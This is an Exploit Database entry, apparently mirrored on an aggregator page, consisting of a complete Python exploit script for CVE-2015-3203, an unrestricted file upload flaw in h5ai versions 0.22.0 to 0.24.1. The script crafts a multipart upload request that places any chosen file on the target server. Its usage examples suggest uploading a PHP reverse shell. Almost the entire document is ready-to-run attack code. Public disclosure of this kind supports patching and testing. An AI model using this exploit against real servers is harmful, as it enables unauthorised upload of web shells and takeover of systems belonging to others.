h5ai < 0.25.0 - Unrestricted Arbitrary File Upload

• Exploit Database
• 94 阅读

• 作者： rTheory
  日期： 2015-09-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/38256/

• #!/usr/bin/env python
  
  # Exploit Title: h5ai < 0.25.0 Unrestricted File Upload
  # Date: 21 September 2015
  # Exploit Author: rTheory
  # Vendor Homepage: https://larsjung.de/h5ai/
  # Vulnerable Software Link: https://web.archive.org/web/20140208063613/http://release.larsjung.de/h5ai/h5ai-0.24.0.zip
  # Vulnerable Versions: 0.22.0 - 0.24.1
  # Tested on: 0.24.0 running on Apache
  # CVE : 2015-3203
  
  import urllib
  import urllib2
  import socket
  import os
  import getopt
  import sys
  
  # Globals with default options
  url = ''
  path = '/'
  fileName = ''
  filePath = ''
  verboseMode = False
  
  def header():
  print '+-----------------------------------------------+'
  print '| File upload exploit for h5ai v0.22.0 - 0.24.1 |'
  print '|See CVE-2015-3203 for vulnerability details|'
  print '+------------------- rTheory -------------------+'
  
  def usage():
  print 
  print 'Usage: %s -t target_url -f upload_file' % os.path.basename(__file__)
  print '-t --target - The URL to connect to'
  print 'ex: http://example.com'
  print '-f --file - The file to upload'
  print 'ex: php-reverse-shell.php'
  print '-p --path - The path to upload to'
  print 'Default is \'/\''
  print '-v --verbose- Enable more verbose output'
  print 
  print 'Examples:'
  print '%s -t http://example.com:8080 -f php-reverse-shell.php' % os.path.basename(__file__)
  print '%s -t http://192.168.1.100 -f php-reverse-shell.php -p /dir/' % os.path.basename(__file__)
  sys.exit(0)
  
  def main():
  global url
  global path
  global fileName
  global filePath
  global verboseMode
  
  header()
  
  if not len(sys.argv[4:]):
  print '[-] Incorrect number of arguments'
  usage()
  
  try:
  opts, args = getopt.getopt(sys.argv[1:],"ht:f:p:v", ["help","target","file","path","verbose"])
  except getopt.GetoptError as err:
  print str(err)
  usage()
  
  for o,a in opts:
  if o in ('-h','--help'):
  usage()
  elif o in ('-t','--target'):
  url = a
  elif o in ('-f','--file'):
  fileName = a
  elif o in ('-p','--path'):
  path = a
  elif o in ('-v','--verbose'):
  verboseMode = True
  else:
  assert False,"Unhandled Option"
  
  # Test target URL, target file, and path inputs for validity
  if not url.startswith('http'):
  print '[-] Error: Target URL must start with http:// or https://'
  usage()
  if not os.path.isfile(fileName):
  print '[-] Error: File does not appear to exist'
  usage()
  if not (path.startswith('/') and path.endswith('/')):
  print '[-] Error: Path must start and end with a \'/\''
  usage()
  
  # Determine target host, which is the URL minus the leading protocol
  if url.find('http://') != -1:
  host = url[7:]
  elif url.find('https://') != -1:
  host = url[8:]
  else:
  host = url
  
  # Store the contents of the upload file into a string
  print '[+] Reading upload file'
  f = open(fileName,'r')
  fileContents = f.read()
  f.close()
  
  MPFB = 'multipartformboundary1442784669030' # constant string used for MIME info
  
  # Header information. Content-Length not needed.
  http_header = {
  "Host" : host,
  "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
  "Accept" : "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
  "Accept-Language" : "en-us,en;q=0.5",
  "Accept-Encoding" : "gzip, deflate",
  "Content-type" : "multipart/form-data; boundary=------" + MPFB,
  "X-Requested-With" : "XMLHttpRequest",
  "Referer" : url + path, 
  "Connection" : "keep-alive"
  }
  
  # POST parameter for file upload
  payload= '--------'+MPFB+'\r\nContent-Disposition: form-data; name="action"\r\n\r\nupload\r\n'
  payload += '--------'+MPFB+'\r\nContent-Disposition: form-data; name="href"\r\n\r\n'+path+'\r\n'
  payload += '--------'+MPFB+'\r\nContent-Disposition: form-data; name="userfile"; filename="'+fileName+'"\r\nContent-Type: \r\n\r\n'+fileContents+'\r\n'
  payload += '--------'+MPFB+'--\r\n'
  
  socket.setdefaulttimeout(5)
  opener = urllib2.build_opener()
  req = urllib2.Request(url, payload, http_header)
  
  # submit request and print output. Expected: "code 0"
  try:
  print '[+] Sending exploit POST request'
  res = opener.open(req)
  html = res.read()
  if verboseMode: print '[+] Server returned: ' + html
  except:
  print '[-] Socket timed out, but it might still have worked...'
  
  # close the connection
  opener.close()
  
  # Last step: check to see if the file uploaded (performed outside of this function)
  filePath = url + path + fileName
  print '[+] Checking to see if the file uploaded:'
  print '[+] ' + filePath 
  
  def postCheck():
  # Check to see if the file exists
  # This may work now that everything from main() was torn down
  global filePath
  try:
  urllib2.urlopen(filePath)
  print '[+] File uploaded successfully!'
  except urllib2.HTTPError, e:
  print '[-] File did not appear to upload'
  except urllib2.URLError, e:
  print '[-] File did not appear to upload'
  
  main()
  postCheck()
  

  Python

  Copy